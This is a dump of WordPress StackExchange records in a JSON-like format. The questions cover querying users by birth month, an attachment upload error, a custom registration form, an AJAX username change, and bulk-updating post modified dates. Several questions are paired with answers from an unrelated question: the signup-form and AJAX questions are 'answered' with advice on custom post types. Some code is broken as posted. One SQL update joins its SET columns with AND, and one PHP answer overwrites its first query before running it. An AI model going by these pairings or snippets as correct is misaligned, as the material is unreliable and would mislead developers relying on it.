"text": "<p>Here is the code based on custom SQL query as suggested by @Rup that should work for you:</p>\n<pre class=\"lang-php prettyprint-override\"><code>// get '-1 month' and '+2 month' dates as an array('YYYY', 'MMDD')\n$before = str_split( gmdate( 'Ymd', strtotime( '-1 month' ) ), 4 );\n$after = str_split( gmdate( 'Ymd', strtotime( '+2 month' ) ), 4 );\n// if the before/after years are the same, should search for date >= before AND <= after\n// if the before/after years are different, should search for date >= before OR <= after\n$cmp = ( $before[0] == $after[0] ) ? 'AND' : 'OR';\n// SQL query\n$users = $wpdb->get_col( $wpdb->prepare(\n "SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = %s AND (SUBSTRING(meta_value, 5, 4) >= '%s' %s SUBSTRING(meta_value, 5, 4) <= '%s')",\n 'date_of_birth', $before[1], $cmp, $after[1]\n));\n</code></pre>\n<p><strong>Update</strong></p>\n<p>Maybe I misunderstand your question looking at your code. The above code would give the list of users whose birthday passed no more than month ago or will happen no more than two months after the current date. To get the list of all users which have their birthday this month or next month, use the following code:</p>\n<pre><code>$current = gmdate( 'm' );\n$next = sprintf( "%02d", $current % 12 + 1 );\n$users = $wpdb->get_col( $wpdb->prepare(\n "SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = %s AND (SUBSTRING(meta_value, 5, 2) = '%s' OR SUBSTRING(meta_value, 5, 2) = '%s')",\n 'date_of_birth', $current, $next\n));\n</code></pre>\n"
}
] | 2020/11/10 | [
"https://wordpress.stackexchange.com/questions/377955",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197337/"
] | I have an ACF field 'date\_of\_birth' which stores the user's birthday, examples: 20201226, 20151225, 19980701
**Goal**: get all users which have their birthday this month, or next month.
I currently have this:
```
$users_start_date_boundary = gmdate( 'Ymd', strtotime( '-1 month' ) );
$users_end_date_boundary = gmdate( 'Ymd', strtotime( '+2 month' ) );
$wp_user_query = new WP_User_Query(
[
'fields' => 'all_with_meta',
'orderby' => 'date_of_birth',
'order' => 'ASC',
'meta_query' => [
[
'key' => 'date_of_birth',
'value' => [ $users_start_date_boundary, $users_end_date_boundary ],
'compare' => 'BETWEEN',
'type' => 'DATE',
],
],
]
);
return $wp_user_query->get_results();
```
The problem with this however, that it only gets users with a birthyear of 2020.
How do I get all users, based on the given month boundaries, while ignoring the year/day the person is born in? | Here is the code based on custom SQL query as suggested by @Rup that should work for you:
```php
// get '-1 month' and '+2 month' dates as an array('YYYY', 'MMDD')
$before = str_split( gmdate( 'Ymd', strtotime( '-1 month' ) ), 4 );
$after = str_split( gmdate( 'Ymd', strtotime( '+2 month' ) ), 4 );
// if the before/after years are the same, should search for date >= before AND <= after
// if the before/after years are different, should search for date >= before OR <= after
$cmp = ( $before[0] == $after[0] ) ? 'AND' : 'OR';
// SQL query
$users = $wpdb->get_col( $wpdb->prepare(
"SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = %s AND (SUBSTRING(meta_value, 5, 4) >= '%s' %s SUBSTRING(meta_value, 5, 4) <= '%s')",
'date_of_birth', $before[1], $cmp, $after[1]
));
```
**Update**
Maybe I misunderstand your question looking at your code. The above code would give the list of users whose birthday passed no more than month ago or will happen no more than two months after the current date. To get the list of all users which have their birthday this month or next month, use the following code:
```
$current = gmdate( 'm' );
$next = sprintf( "%02d", $current % 12 + 1 );
$users = $wpdb->get_col( $wpdb->prepare(
"SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = %s AND (SUBSTRING(meta_value, 5, 2) = '%s' OR SUBSTRING(meta_value, 5, 2) = '%s')",
'date_of_birth', $current, $next
));
``` |
378,042 | <p>Could not insert attachment into the database.</p>
<p>When ever I try to upload new images from WordPress media it shows me above error.</p>
<p>Please help me why wp database shows this error.</p>
| [
{
"answer_id": 378054,
"author": "Walter P.",
"author_id": 65317,
"author_profile": "https://wordpress.stackexchange.com/users/65317",
"pm_score": 1,
"selected": true,
"text": "<p>Try the following solutins:</p>\n<ol>\n<li><p>First of all check your WP database size and check whether the size is full according to your hosting provider's requirement/rule.</p>\n</li>\n<li><p>Second option, add this line into your <strong>wp-config.php</strong>:</p>\n</li>\n</ol>\n<pre><code>define('WP_MEMORY_LIMIT', '256M');\n</code></pre>\n<p>Also if you have access to <strong>php.ini</strong> (or php[version number].ini) file on your server, try to add this line:</p>\n<pre><code>memory_limit 512M \n</code></pre>\n<ol start=\"3\">\n<li><p>By default, some database configs have a collation or charset that doesn't allow special character. Check whether the file name of the image you're trying to upload is having any special characters. If so, delete them and use only alphanumeric. Then retry.</p>\n</li>\n<li><p>Also, please check your folder permission. Read more about it on <a href=\"https://www.wpbeginner.com/wp-tutorials/how-to-fix-image-upload-issue-in-wordpress/\" rel=\"nofollow noreferrer\">https://www.wpbeginner.com/wp-tutorials/how-to-fix-image-upload-issue-in-wordpress/</a></p>\n</li>\n</ol>\n<p>Hope it helps.</p>\n"
},
{
"answer_id": 401939,
"author": "Narkanister",
"author_id": 132832,
"author_profile": "https://wordpress.stackexchange.com/users/132832",
"pm_score": 1,
"selected": false,
"text": "<p>Auto-increment missing...</p>\n<p>Same issue. I'd migrated the site from another server. Found that the Auto-Increment flag was missing from the wp_post table's ID column. I switched that back on and the problem resolved.</p>\n<p>It seems like ALL the tables had lost auto-increment from their ID columns though.... headache!</p>\n"
}
] | 2020/11/12 | [
"https://wordpress.stackexchange.com/questions/378042",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/145005/"
] | Could not insert attachment into the database.
When ever I try to upload new images from WordPress media it shows me above error.
Please help me why wp database shows this error. | Try the following solutins:
1. First of all check your WP database size and check whether the size is full according to your hosting provider's requirement/rule.
2. Second option, add this line into your **wp-config.php**:
```
define('WP_MEMORY_LIMIT', '256M');
```
Also if you have access to **php.ini** (or php[version number].ini) file on your server, try to add this line:
```
memory_limit 512M
```
3. By default, some database configs have a collation or charset that doesn't allow special character. Check whether the file name of the image you're trying to upload is having any special characters. If so, delete them and use only alphanumeric. Then retry.
4. Also, please check your folder permission. Read more about it on <https://www.wpbeginner.com/wp-tutorials/how-to-fix-image-upload-issue-in-wordpress/>
Hope it helps. |
378,187 | <p>I am using this code as a custom signup form. Is there any chance to create a success message for it?</p>
<pre class="lang-php prettyprint-override"><code><?php
/*
** Template Name: Custom Register Page
*/
get_header();
global $wpdb, $user_ID;
if (isset($_POST['user_registeration']))
{
//registration_validation($_POST['username'], $_POST['useremail']);
global $reg_errors;
$reg_errors = new WP_Error;
$username=$_POST['username'];
$useremail=$_POST['useremail'];
$password=$_POST['password'];
if(empty( $username ) || empty( $useremail ) || empty($password))
{
$reg_errors->add('field', 'Required form field is missing');
}
if ( 6 > strlen( $username ) )
{
$reg_errors->add('username_length', 'Username too short. At least 6 characters is required' );
}
if ( username_exists( $username ) )
{
$reg_errors->add('user_name', 'The username you entered already exists!');
}
if ( ! validate_username( $username ) )
{
$reg_errors->add( 'username_invalid', 'The username you entered is not valid!' );
}
if ( !is_email( $useremail ) )
{
$reg_errors->add( 'email_invalid', 'Email id is not valid!' );
}
if ( email_exists( $useremail ) )
{
$reg_errors->add( 'email', 'Email Already exist!' );
}
if ( 5 > strlen( $password ) ) {
$reg_errors->add( 'password', 'Password length must be greater than 5!' );
}
if (is_wp_error( $reg_errors ))
{
foreach ( $reg_errors->get_error_messages() as $error )
{
$signUpError='<p style="color:#FF0000; text-aling:left;"><strong>ERROR</strong>: '.$error . '<br /></p>';
}
}
if ( 1 > count( $reg_errors->get_error_messages() ) )
{
// sanitize user form input
global $username, $useremail;
$username = sanitize_user( $_POST['username'] );
$useremail = sanitize_email( $_POST['useremail'] );
$password = esc_attr( $_POST['password'] );
$userdata = array(
'user_login' => $username,
'user_email' => $useremail,
'user_pass' => $password,
);
$user = wp_insert_user( $userdata );
}
}
?>
<h3>Create your account</h3>
<form action="" method="post" name="user_registeration">
<label>Username <span class="error">*</span></label>
<input type="text" name="username" placeholder="Enter Your Username" class="text" required /><br />
<label>Email address <span class="error">*</span></label>
<input type="text" name="useremail" class="text" placeholder="Enter Your Email" required /> <br />
<label>Password <span class="error">*</span></label>
<input type="password" name="password" class="text" placeholder="Enter Your password" required /> <br />
<input type="submit" name="user_registeration" value="SignUp" />
</form>
<?php if(isset($signUpError)){echo '<div>'.$signUpError.'</div>';}?>
</code></pre>
| [
{
"answer_id": 378148,
"author": "Chris Norman",
"author_id": 188864,
"author_profile": "https://wordpress.stackexchange.com/users/188864",
"pm_score": 1,
"selected": false,
"text": "<p>That is a fairly open-ended question. There is a lot you will have to do. The first step is you will have to create the database. It will look something like this:</p>\n<pre><code>function db_install() {\n \n global $wpdb;\n global $db_version;\n\n $table_name = $wpdb->prefix . 'thenameofyourdatabase';\n\n $charset_collate = $wpdb->get_charset_collate();\n \n $sql = "CREATE TABLE $table_name (\n user_id BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT,\n first_name tinytext NOT NULL,\n last_name tinytext NOT NULL,\n type_of_work text NOT NULL,\n PRIMARY KEY (user_id)\n ) $charset_collate;";\n\n require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );\n dbDelta( $sql );\n\n add_option( 'db_version', $db_version );\n\n\n}\n</code></pre>\n<p>You will need to add more tables to match your created database.\nThis should get you started...you can read here for more information: <a href=\"https://codex.wordpress.org/Creating_Tables_with_Plugins\" rel=\"nofollow noreferrer\">https://codex.wordpress.org/Creating_Tables_with_Plugins</a></p>\n<p>After this, since this will not provide you any user interface, you will need to create that. One method is creating a custom plugin - using the code above - as well as (I would suggest) jQuery. You would use jQuery to talk with the database, via AJAX, and populate the contents of the page.</p>\n<p>One reason this may be a good option is the user will not need to refresh the page - they can gather all the data from all those companies from a single page.</p>\n<p>Both methods would take work - if you go with the custom post type/custom taxonomies - you will need to still create those over 100 pages. If you go with the plugin, there is a good amount of work ahead in setting that up. Both require some work, so it depends on your preferred method.</p>\n<p>If you want more information on jQuery and AJAX here are some references to get you started:</p>\n<p><a href=\"https://developer.wordpress.org/plugins/javascript/jquery/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/javascript/jquery/</a></p>\n<p><a href=\"https://developer.wordpress.org/plugins/javascript/ajax/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/javascript/ajax/</a></p>\n"
},
{
"answer_id": 378182,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 1,
"selected": true,
"text": "<p>Custom post types and taxonomies are the appropriate method of doing this. It sounds like you've already identified the appropriate taxonomies and CPT:</p>\n<ul>\n<li>A <code>company</code> post type</li>\n<li>A <code>company_type</code> taxonomy</li>\n</ul>\n<p><code>register_post_type</code> and <code>register_taxonomy</code> can do this for you. Don't forget to re-save permalinks if you use those functions or change their parameters.</p>\n<p>After doing this, new sections will appear in the Admin sidemenu, as well as frontend listings, and theme templates.</p>\n<p>Further Reading</p>\n<ul>\n<li><a href=\"https://developer.wordpress.org/reference/functions/register_post_type/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/register_post_type/</a></li>\n<li><a href=\"https://developer.wordpress.org/reference/functions/register_taxonomy/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/register_taxonomy/</a></li>\n<li><a href=\"https://developer.wordpress.org/plugins/post-types/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/post-types/</a></li>\n<li><a href=\"https://developer.wordpress.org/plugins/post-types/registering-custom-post-types/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/post-types/registering-custom-post-types/</a></li>\n<li><a href=\"https://developer.wordpress.org/plugins/taxonomies/working-with-custom-taxonomies/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/taxonomies/working-with-custom-taxonomies/</a></li>\n</ul>\n<p>Generators:</p>\n<ul>\n<li><a href=\"https://generatewp.com/post-type/\" rel=\"nofollow noreferrer\">https://generatewp.com/post-type/</a></li>\n<li><a href=\"https://generatewp.com/taxonomy/\" rel=\"nofollow noreferrer\">https://generatewp.com/taxonomy/</a></li>\n</ul>\n"
}
] | 2020/11/14 | [
"https://wordpress.stackexchange.com/questions/378187",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197559/"
] | I am using this code as a custom signup form. Is there any chance to create a success message for it?
```php
<?php
/*
** Template Name: Custom Register Page
*/
get_header();
global $wpdb, $user_ID;
if (isset($_POST['user_registeration']))
{
//registration_validation($_POST['username'], $_POST['useremail']);
global $reg_errors;
$reg_errors = new WP_Error;
$username=$_POST['username'];
$useremail=$_POST['useremail'];
$password=$_POST['password'];
if(empty( $username ) || empty( $useremail ) || empty($password))
{
$reg_errors->add('field', 'Required form field is missing');
}
if ( 6 > strlen( $username ) )
{
$reg_errors->add('username_length', 'Username too short. At least 6 characters is required' );
}
if ( username_exists( $username ) )
{
$reg_errors->add('user_name', 'The username you entered already exists!');
}
if ( ! validate_username( $username ) )
{
$reg_errors->add( 'username_invalid', 'The username you entered is not valid!' );
}
if ( !is_email( $useremail ) )
{
$reg_errors->add( 'email_invalid', 'Email id is not valid!' );
}
if ( email_exists( $useremail ) )
{
$reg_errors->add( 'email', 'Email Already exist!' );
}
if ( 5 > strlen( $password ) ) {
$reg_errors->add( 'password', 'Password length must be greater than 5!' );
}
if (is_wp_error( $reg_errors ))
{
foreach ( $reg_errors->get_error_messages() as $error )
{
$signUpError='<p style="color:#FF0000; text-aling:left;"><strong>ERROR</strong>: '.$error . '<br /></p>';
}
}
if ( 1 > count( $reg_errors->get_error_messages() ) )
{
// sanitize user form input
global $username, $useremail;
$username = sanitize_user( $_POST['username'] );
$useremail = sanitize_email( $_POST['useremail'] );
$password = esc_attr( $_POST['password'] );
$userdata = array(
'user_login' => $username,
'user_email' => $useremail,
'user_pass' => $password,
);
$user = wp_insert_user( $userdata );
}
}
?>
<h3>Create your account</h3>
<form action="" method="post" name="user_registeration">
<label>Username <span class="error">*</span></label>
<input type="text" name="username" placeholder="Enter Your Username" class="text" required /><br />
<label>Email address <span class="error">*</span></label>
<input type="text" name="useremail" class="text" placeholder="Enter Your Email" required /> <br />
<label>Password <span class="error">*</span></label>
<input type="password" name="password" class="text" placeholder="Enter Your password" required /> <br />
<input type="submit" name="user_registeration" value="SignUp" />
</form>
<?php if(isset($signUpError)){echo '<div>'.$signUpError.'</div>';}?>
``` | Custom post types and taxonomies are the appropriate method of doing this. It sounds like you've already identified the appropriate taxonomies and CPT:
* A `company` post type
* A `company_type` taxonomy
`register_post_type` and `register_taxonomy` can do this for you. Don't forget to re-save permalinks if you use those functions or change their parameters.
After doing this, new sections will appear in the Admin sidemenu, as well as frontend listings, and theme templates.
Further Reading
* <https://developer.wordpress.org/reference/functions/register_post_type/>
* <https://developer.wordpress.org/reference/functions/register_taxonomy/>
* <https://developer.wordpress.org/plugins/post-types/>
* <https://developer.wordpress.org/plugins/post-types/registering-custom-post-types/>
* <https://developer.wordpress.org/plugins/taxonomies/working-with-custom-taxonomies/>
Generators:
* <https://generatewp.com/post-type/>
* <https://generatewp.com/taxonomy/> |
378,229 | <p>Will someone guide why this code doesn't work. Even the data gets changed.
Here is the ajax I use.</p>
<pre><code>jQuery(document).ready(function($) {
$(".ue_ajax_enabled").on('click', function(event) {
event.preventDefault();
/* Act on the event */
$.ajax({
url: ue_ajax.ajax_url,
type: 'POST',
/*dataType: 'json',*/
data: {
'action' : 'ue_ajax_enabled',
'new_username' : $("#new_username").val(),
'nonce' : $("#new_username_nonce_check").val(),
},
beforeSend: function () {
$(".ue_ajax_enabled").text(ue_ajax.beforeMessage);
},
success: function (data) {
console.log('Success');
console.log(data);
},
error: function (data) {
console.log('Error');
console.log(data);
}
})
});
});
</code></pre>
<p>Here is the ajax action hook I use.</p>
<pre><code> add_action( "wp_ajax_ue_ajax_enabled", 'ue_ajax_enabled' );
function ue_ajax_enabled() {
global $wpdb;
$currentUser = wp_get_current_user();
$user_id = $currentUser->ID;
if ( is_user_logged_in() && wp_verify_nonce( $_REQUEST['nonce'], 'new_username_nonce' ) && ! empty($_REQUEST['new_username'])) {
// Get name of our users table
$tableName = $wpdb->prefix . 'users';
if ( !username_exists( $_REQUEST['new_username'] ) ) {
// Stripslashes and trim any whitespace, also replace whitespace with underscore
$newUsername = trim(str_replace(' ', '_', stripslashes($_REQUEST['new_username'])));
} else {
echo json_encode( array('username' => 'Username exists, try any other') );
die();
}
// Data to change
$dataToChange = array('user_login' => $newUsername);
// Where to Change
$whereToChange = array('ID' => $user_id);
// Change the data inside the table
$result = $wpdb->update($tableName, $dataToChange, $whereToChange, array('%s'), array('%d'));
if ($result) {
echo json_encode( array('update' => true) );
} else {
echo json_encode( array('update' => false) );
die();
}
if (ue_send_email_to_user()) {
$subject = 'Username Changed Successfully ID:' . $user_id;
$message = "<p>You username has been successfully changed. Your new details are given below.</p>";
$message .= "<strong>Previous Username:</strong><span>{$currentUser->user_login}</span>";
$message .= "<strong>New Username</strong><span>{$newUsername}</span>";
$from = "From: " . get_bloginfo('name');
wp_mail( array(ue_get_administrators_email(), $currentUser->email), $subject, $message, $from );
}
}
die();
}
</code></pre>
<p>The code throws an error message in the console instead of the success message of the ajax set earlier. Any clue why this happens.
Thanks in advance</p>
<p><strong>UPDATE: by commenting datatype the problem solves. But still it shows undefined when i access json.</strong></p>
| [
{
"answer_id": 378148,
"author": "Chris Norman",
"author_id": 188864,
"author_profile": "https://wordpress.stackexchange.com/users/188864",
"pm_score": 1,
"selected": false,
"text": "<p>That is a fairly open-ended question. There is a lot you will have to do. The first step is you will have to create the database. It will look something like this:</p>\n<pre><code>function db_install() {\n \n global $wpdb;\n global $db_version;\n\n $table_name = $wpdb->prefix . 'thenameofyourdatabase';\n\n $charset_collate = $wpdb->get_charset_collate();\n \n $sql = "CREATE TABLE $table_name (\n user_id BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT,\n first_name tinytext NOT NULL,\n last_name tinytext NOT NULL,\n type_of_work text NOT NULL,\n PRIMARY KEY (user_id)\n ) $charset_collate;";\n\n require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );\n dbDelta( $sql );\n\n add_option( 'db_version', $db_version );\n\n\n}\n</code></pre>\n<p>You will need to add more tables to match your created database.\nThis should get you started...you can read here for more information: <a href=\"https://codex.wordpress.org/Creating_Tables_with_Plugins\" rel=\"nofollow noreferrer\">https://codex.wordpress.org/Creating_Tables_with_Plugins</a></p>\n<p>After this, since this will not provide you any user interface, you will need to create that. One method is creating a custom plugin - using the code above - as well as (I would suggest) jQuery. You would use jQuery to talk with the database, via AJAX, and populate the contents of the page.</p>\n<p>One reason this may be a good option is the user will not need to refresh the page - they can gather all the data from all those companies from a single page.</p>\n<p>Both methods would take work - if you go with the custom post type/custom taxonomies - you will need to still create those over 100 pages. If you go with the plugin, there is a good amount of work ahead in setting that up. Both require some work, so it depends on your preferred method.</p>\n<p>If you want more information on jQuery and AJAX here are some references to get you started:</p>\n<p><a href=\"https://developer.wordpress.org/plugins/javascript/jquery/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/javascript/jquery/</a></p>\n<p><a href=\"https://developer.wordpress.org/plugins/javascript/ajax/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/javascript/ajax/</a></p>\n"
},
{
"answer_id": 378182,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 1,
"selected": true,
"text": "<p>Custom post types and taxonomies are the appropriate method of doing this. It sounds like you've already identified the appropriate taxonomies and CPT:</p>\n<ul>\n<li>A <code>company</code> post type</li>\n<li>A <code>company_type</code> taxonomy</li>\n</ul>\n<p><code>register_post_type</code> and <code>register_taxonomy</code> can do this for you. Don't forget to re-save permalinks if you use those functions or change their parameters.</p>\n<p>After doing this, new sections will appear in the Admin sidemenu, as well as frontend listings, and theme templates.</p>\n<p>Further Reading</p>\n<ul>\n<li><a href=\"https://developer.wordpress.org/reference/functions/register_post_type/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/register_post_type/</a></li>\n<li><a href=\"https://developer.wordpress.org/reference/functions/register_taxonomy/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/register_taxonomy/</a></li>\n<li><a href=\"https://developer.wordpress.org/plugins/post-types/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/post-types/</a></li>\n<li><a href=\"https://developer.wordpress.org/plugins/post-types/registering-custom-post-types/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/post-types/registering-custom-post-types/</a></li>\n<li><a href=\"https://developer.wordpress.org/plugins/taxonomies/working-with-custom-taxonomies/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/plugins/taxonomies/working-with-custom-taxonomies/</a></li>\n</ul>\n<p>Generators:</p>\n<ul>\n<li><a href=\"https://generatewp.com/post-type/\" rel=\"nofollow noreferrer\">https://generatewp.com/post-type/</a></li>\n<li><a href=\"https://generatewp.com/taxonomy/\" rel=\"nofollow noreferrer\">https://generatewp.com/taxonomy/</a></li>\n</ul>\n"
}
] | 2020/11/16 | [
"https://wordpress.stackexchange.com/questions/378229",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/140102/"
] | Will someone guide why this code doesn't work. Even the data gets changed.
Here is the ajax I use.
```
jQuery(document).ready(function($) {
$(".ue_ajax_enabled").on('click', function(event) {
event.preventDefault();
/* Act on the event */
$.ajax({
url: ue_ajax.ajax_url,
type: 'POST',
/*dataType: 'json',*/
data: {
'action' : 'ue_ajax_enabled',
'new_username' : $("#new_username").val(),
'nonce' : $("#new_username_nonce_check").val(),
},
beforeSend: function () {
$(".ue_ajax_enabled").text(ue_ajax.beforeMessage);
},
success: function (data) {
console.log('Success');
console.log(data);
},
error: function (data) {
console.log('Error');
console.log(data);
}
})
});
});
```
Here is the ajax action hook I use.
```
add_action( "wp_ajax_ue_ajax_enabled", 'ue_ajax_enabled' );
function ue_ajax_enabled() {
global $wpdb;
$currentUser = wp_get_current_user();
$user_id = $currentUser->ID;
if ( is_user_logged_in() && wp_verify_nonce( $_REQUEST['nonce'], 'new_username_nonce' ) && ! empty($_REQUEST['new_username'])) {
// Get name of our users table
$tableName = $wpdb->prefix . 'users';
if ( !username_exists( $_REQUEST['new_username'] ) ) {
// Stripslashes and trim any whitespace, also replace whitespace with underscore
$newUsername = trim(str_replace(' ', '_', stripslashes($_REQUEST['new_username'])));
} else {
echo json_encode( array('username' => 'Username exists, try any other') );
die();
}
// Data to change
$dataToChange = array('user_login' => $newUsername);
// Where to Change
$whereToChange = array('ID' => $user_id);
// Change the data inside the table
$result = $wpdb->update($tableName, $dataToChange, $whereToChange, array('%s'), array('%d'));
if ($result) {
echo json_encode( array('update' => true) );
} else {
echo json_encode( array('update' => false) );
die();
}
if (ue_send_email_to_user()) {
$subject = 'Username Changed Successfully ID:' . $user_id;
$message = "<p>You username has been successfully changed. Your new details are given below.</p>";
$message .= "<strong>Previous Username:</strong><span>{$currentUser->user_login}</span>";
$message .= "<strong>New Username</strong><span>{$newUsername}</span>";
$from = "From: " . get_bloginfo('name');
wp_mail( array(ue_get_administrators_email(), $currentUser->email), $subject, $message, $from );
}
}
die();
}
```
The code throws an error message in the console instead of the success message of the ajax set earlier. Any clue why this happens.
Thanks in advance
**UPDATE: by commenting datatype the problem solves. But still it shows undefined when i access json.** | Custom post types and taxonomies are the appropriate method of doing this. It sounds like you've already identified the appropriate taxonomies and CPT:
* A `company` post type
* A `company_type` taxonomy
`register_post_type` and `register_taxonomy` can do this for you. Don't forget to re-save permalinks if you use those functions or change their parameters.
After doing this, new sections will appear in the Admin sidemenu, as well as frontend listings, and theme templates.
Further Reading
* <https://developer.wordpress.org/reference/functions/register_post_type/>
* <https://developer.wordpress.org/reference/functions/register_taxonomy/>
* <https://developer.wordpress.org/plugins/post-types/>
* <https://developer.wordpress.org/plugins/post-types/registering-custom-post-types/>
* <https://developer.wordpress.org/plugins/taxonomies/working-with-custom-taxonomies/>
Generators:
* <https://generatewp.com/post-type/>
* <https://generatewp.com/taxonomy/> |
378,280 | <p>i want to update all my wordpress post modified date and time to a specific date and time,
i have a code to update it base on the id, but i want one to update all the row at once without putting the id of the posts .</p>
<pre class="lang-php prettyprint-override"><code>$sql = "UPDATE Zulu_posts SET post_modified='2020-11-17 16:06:00' WHERE id=2";
if ($conn->query($sql) === TRUE) {
echo "Record updated successfully";
} else {
echo "Error updating record: " . $conn->error;
}
$conn->close();
</code></pre>
| [
{
"answer_id": 378281,
"author": "phatskat",
"author_id": 20143,
"author_profile": "https://wordpress.stackexchange.com/users/20143",
"pm_score": 1,
"selected": true,
"text": "<p>You can use a generalized update query. As always, when dealing with databases <strong>take a backup first</strong>.</p>\n<p>With that out of the way, your query should look something like:</p>\n<pre class=\"lang-sql prettyprint-override\"><code>BEGIN; -- Start a transaction\nUPDATE\n wp_posts\nSET\n post_modified = <Your new date>\n AND post_modified_gmt = <Your new date in GMT>;\n\nSELECT * FROM wp_posts LIMIT 10 ORDER BY post_date DESC; -- See the 10 most recently authored posts, make sure their post_modified and post_modified_gmt looks good\n\nCOMMIT; -- Commit the changes to the database or\nROLLBACK; -- If things don't look right.\n</code></pre>\n<p><strong>Edit</strong>: in your case, if you do this in PHP, <strong>definitely</strong> take a backup, and then make <code>$sql</code> everything above except for the lines with <code>BEGIN</code>, <code>COMMIT</code>, and <code>ROLLBACK</code>, though I'd recommend doing this in the command line or a GUI/web interface.</p>\n"
},
{
"answer_id": 378286,
"author": "KingSolomon",
"author_id": 197646,
"author_profile": "https://wordpress.stackexchange.com/users/197646",
"pm_score": 1,
"selected": false,
"text": "<pre><code><?php\n\n\n$servername = "localhost";\n$username = "user";\n$password = "pass";\n$dbname = "db";\n\n// Create connection\n$conn = new mysqli($servername, $username, $password, $dbname);\n// Check connection\nif ($conn->connect_error) {\n die("Connection failed: " . $conn->connect_error);\n}\n\n$sql = "UPDATE zulu_posts SET post_modified_gmt = '2020-11-17-04:00:00'";\n$sql = "UPDATE zulu_posts SET post_modified = '2020-11-17-04:00:00'";\n\nif ($conn->query($sql) === TRUE) {\n echo "Record updated successfully";\n} else {\n echo "Error updating record: " . $conn->error;\n}\n\n$conn->close();\n?>\n</code></pre>\n<p>Ok bro this one worked, but i could like to add a form where by i can input the date and time i want and submit.\nPlease any idea on how i can do it</p>\n"
}
] | 2020/11/17 | [
"https://wordpress.stackexchange.com/questions/378280",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197646/"
] | i want to update all my wordpress post modified date and time to a specific date and time,
i have a code to update it base on the id, but i want one to update all the row at once without putting the id of the posts .
```php
$sql = "UPDATE Zulu_posts SET post_modified='2020-11-17 16:06:00' WHERE id=2";
if ($conn->query($sql) === TRUE) {
echo "Record updated successfully";
} else {
echo "Error updating record: " . $conn->error;
}
$conn->close();
``` | You can use a generalized update query. As always, when dealing with databases **take a backup first**.
With that out of the way, your query should look something like:
```sql
BEGIN; -- Start a transaction
UPDATE
wp_posts
SET
post_modified = <Your new date>
AND post_modified_gmt = <Your new date in GMT>;
SELECT * FROM wp_posts LIMIT 10 ORDER BY post_date DESC; -- See the 10 most recently authored posts, make sure their post_modified and post_modified_gmt looks good
COMMIT; -- Commit the changes to the database or
ROLLBACK; -- If things don't look right.
```
**Edit**: in your case, if you do this in PHP, **definitely** take a backup, and then make `$sql` everything above except for the lines with `BEGIN`, `COMMIT`, and `ROLLBACK`, though I'd recommend doing this in the command line or a GUI/web interface. |
378,343 | <p>I'm trying to replace the "thumb-w" CSS class with "thumb-w1", just the first time.
This is the starting function:</p>
<pre><code>function start_modify_html() {
ob_start();
}
function end_modify_html() {
$html = ob_get_clean();
$html = str_replace( 'thumb-w', 'thumb-w 1', $html);
echo $html;
}
add_action( 'wp_head', 'start_modify_html' );
add_action( 'wp_footer', 'end_modify_html' );
</code></pre>
<p>I tried entering "1" in the str_replace in this way:</p>
<pre><code>$html = str_replace( 'thumb-w', 'thumb-w 1', $html);
</code></pre>
<p>but it doesn't seem to work.
Can you help me?
Thanks</p>
| [
{
"answer_id": 378281,
"author": "phatskat",
"author_id": 20143,
"author_profile": "https://wordpress.stackexchange.com/users/20143",
"pm_score": 1,
"selected": true,
"text": "<p>You can use a generalized update query. As always, when dealing with databases <strong>take a backup first</strong>.</p>\n<p>With that out of the way, your query should look something like:</p>\n<pre class=\"lang-sql prettyprint-override\"><code>BEGIN; -- Start a transaction\nUPDATE\n wp_posts\nSET\n post_modified = <Your new date>\n AND post_modified_gmt = <Your new date in GMT>;\n\nSELECT * FROM wp_posts LIMIT 10 ORDER BY post_date DESC; -- See the 10 most recently authored posts, make sure their post_modified and post_modified_gmt looks good\n\nCOMMIT; -- Commit the changes to the database or\nROLLBACK; -- If things don't look right.\n</code></pre>\n<p><strong>Edit</strong>: in your case, if you do this in PHP, <strong>definitely</strong> take a backup, and then make <code>$sql</code> everything above except for the lines with <code>BEGIN</code>, <code>COMMIT</code>, and <code>ROLLBACK</code>, though I'd recommend doing this in the command line or a GUI/web interface.</p>\n"
},
{
"answer_id": 378286,
"author": "KingSolomon",
"author_id": 197646,
"author_profile": "https://wordpress.stackexchange.com/users/197646",
"pm_score": 1,
"selected": false,
